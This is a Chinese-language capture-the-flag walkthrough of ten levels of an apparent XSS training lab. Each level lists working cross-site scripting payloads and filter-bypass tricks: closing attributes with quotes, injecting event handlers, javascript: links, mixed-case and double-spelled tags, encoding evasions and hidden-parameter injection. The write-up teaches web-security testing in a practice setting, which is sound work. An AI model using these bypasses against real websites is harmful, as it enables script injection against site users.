第一关
我们来到第一关发现什么提示也没有试着输一个<script>alert()</script>
第一关还是简单的直接输入就可以了
第二关
一,我们尝试在搜索框输入<script>alert()</script>发现没有成功
二,查看一下源代码
输入的<script>alert()</script>在<input>标签的value中,需要">闭合
三,搜索框输入"><script>alert()</script>
结果很不错,我们也通过了第二关
第三关
一,首先输入<script>alert()</script>尝试一下看看行不行
emmmm,差点意思
二,查看一下源代码
发现符号被实体化了
三,输入框输入' a'> οnclick='alert(1)',再点击输入框
第四关
一,我们还是尝试输入<script>alert()</script>
二,查看一下源代码
发现符号也被实体化了
三,输入框输入"οnclick="alert(1),再点击输入框(双引号闭合)
第五关
一,我们尝试输入" οnfοcus=javascript:alert() "
二,查看一下源代码
三,发现对事件on做了过滤,在他们中间加了_,尝试用a标签的href 属性来构造payload,输入"><a href='javascript:alert(123);'>点击我</a>,点击" "> "
第六关
一,先输入" οnfοcus=javascript:alert() "尝试,查看源代码
二,尝试用onfocus <script> <a href=javascript:alert()>
三,尝试大小写绕过OnFocus <sCriPt> <a hReF=javascript:alert()>
四,发现大小写没有被过滤掉,这题能利用大小写进行绕过,所以我们可以用下面的方法,构造payload
"> <a hRef=javascript:alert()>1</a> <"
点击一
第七关
一,输入关键字" OnFocus <sCriPt> <a hReF=javascript:alert()>,查看网页源代码
传进去的值,经过转化后变成了
" focus <> <a =java:alert()>
二,采用双拼写绕过"><scscriptript>alert()</scscriptript>
第八关
一,输入javascript:alert()查看网页源码
二,用Unicode编码解码编码绕过javascript:alert("jaden")
三,输入步骤二点击友情链接
第九关
一,输入javascript:alert()查看网页源码
二,用Unicode编码解码编码绕过
javascript:alert()/* http:// */
三,输入步骤二点击友情链接
第十关
一,发现没有输入框,通过F12查看网页源码
发现有三个隐藏的标签,没有输入的地方,就在URL中,尝试将隐藏标签显示出来
二,在搜索栏输入&t_sort=111" οnclick=javascript:alert() type="text"
三,点击一下输入框,成功
